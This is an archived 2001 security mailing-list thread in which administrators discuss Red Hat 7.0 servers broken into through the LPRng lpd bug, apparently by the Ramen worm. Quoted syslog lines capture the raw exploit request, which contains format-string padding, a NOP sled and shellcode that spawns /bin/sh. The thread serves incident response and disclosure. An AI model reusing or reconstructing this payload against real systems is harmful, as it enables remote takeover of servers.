Re: Ramen worm . More details on it. ( found a password and e-mai ls crypted inside it)

["Tharakan, Royans" <RTharakan () INGENUITY COM>]

Hi Daniel,

        I got this from one of the mailing lists about lpd exploit for RH7.
        May be this is what was used by Ramen too. 
        
regards,
Royans

=================================
> From security () HOTCHILLI CO UK Mon Jan 15 21:01:44 2001
Date: Mon, 15 Jan 2001 13:40:13 -0000
From: Security <security () HOTCHILLI CO UK>
To: FOCUS-IH () SECURITYFOCUS COM
Subject: "lpd" - Redhat 7.0 Been Hacked

NB: For a complete message log SEE Base of email
we also have the files they installed

Hi

Not a nice weekend. Two Redhat 7.0 servers have been hacked, these where
test servers, well one was going to be a production server but not quite
finished.

Anyway:

They got in through "lpd" printer service which "yes" on all our production
servers is disabled.

They then ran ./hack.sh and Synscan :(

Here is the error messages log - fortuanatly we still had access - but not
telnet or anything.

We also have all the files they installed on the box (very intertesting) -
If anyone would like these please email
me - I dont want to put these on the list.

=====================================

I also noticed this:

Here is some research:

http://lwn.net/2000/0928/a/sec-lprng.php3

Jan 14 10:38:01 dns1 SERVER[26771]: Dispatch_input: bad request line
=====================================

This was a telnet approach, they used lpd (i think)

Anyone any comments (accept why was lpt running) would be usefull.

regards

Tony
Hotchilli Internet

Jan 14 10:38:01 dns1 SERVER[26771]: Dispatch_input: bad request line
'BBÜó^?¿Ýó^?¿Þó^?¿ßó^?¿XXXXXXXXXXXXXXXXXX00000000000000000000000000000000000
0000
0000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000048000000000000134727061security000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000135021832^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð1Û1É1À°FÍ^À^Éå1Ò²f^ÉÐ1É^ÉËC^É]øC^É]ôK^ÉMü^ÍMôÍ^À1É^ÉEôCf^É]ìfÇEî
^O'^ÉMð^ÍEì^ÉEøÆEü^P
^ÉÐ^ÍMôÍ^À^ÉÐCCÍ^À^ÉÐCÍ^À^ÉÃ1ɲ?^ÉÐÍ^À^ÉÐAÍ^Àë^X^^Éu^H1À^ÈF^G^ÉE^L°^K^Éó^ÍM^
H^ÍU^LÍ^Àèã^?^?^?/bin/
sh'
Jan 14 10:38:01 dns1 SERVER[26772]: Dispatch_input: bad request line
'BB(ñ^?¿)ñ^?¿*ñ^?¿+ñ^?¿XXXXXXXXXXXXXXXXXX00000000000000000000000000000000000
0000

0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000004800000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
000134727061security.i000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000135021832^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð
^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð1Û1É1À°F
Í^À^Éå1Ò²f^ÉÐ1É^ÉËC^É]øC^É]ôK^ÉMü^ÍMôÍ^À1É^É
EôCf^É]ìfÇEî^O'^ÉMð^ÍEì^ÉEøÆEü^P^ÉÐ^ÍMôÍ^À^ÉÐCCÍ^À^ÉJan 14 10:38:11 dns1
xinetd[4782]:
Starting soft reconfiguration
Jan 14 10:38:12 dns1 xinetd[4782]: linuxconf disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: ntalk disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: tftp disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: exec disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: talk disabled, removing
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service finger
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service ftp
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service telnet
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service shell
Jan 14 10:38:12 dns1 xinetd[4782]: readjusting service login
Jan 14 10:38:12 dns1 xinetd[4782]: Reconfigured: new=1 old=5 dropped=0
(services)
Jan 14 10:38:12 dns1 modprobe: Note: /etc/modules.conf is more recent than
/lib/modules/2.2.16-22/modules.dep
Jan 14 10:38:12 dns1 modprobe: modprobe: Can't locate module pø^?¿lo
Jan 14 10:38:12 dns1 modprobe: Note: /etc/modules.conf is more recent than
/lib/modules/2.2.16-22/modules.dep
Jan 14 10:38:12 dns1 modprobe: modprobe: Can't locate module ^Ðø^?¿lo
Jan 14 10:38:12 dns1 kernel: synscan uses obsolete (PF_INET,SOCK_PACKET)

===================================================================



-----Original Message-----
From: Daniel Martin [mailto:dtmartin24 () HOME COM]
Sent: Tuesday, January 16, 2001 6:42 PM
To: INCIDENTS () SECURITYFOCUS COM
Subject: Re: Ramen worm . More details on it. ( found a password and
e-mails crypted inside it)


Redhat 7 machines are attacked by something that appears to be aimed
at the LPRng syslog format bug, but I can't find anything out about
this tool beyond that.  Since the person making this worm forgot to
strip one of the copies of this tool that is included in the worm,
maybe someone else will fill me in on what tool this is.  In any case,
once that is achieved the same shell commands as before are executed.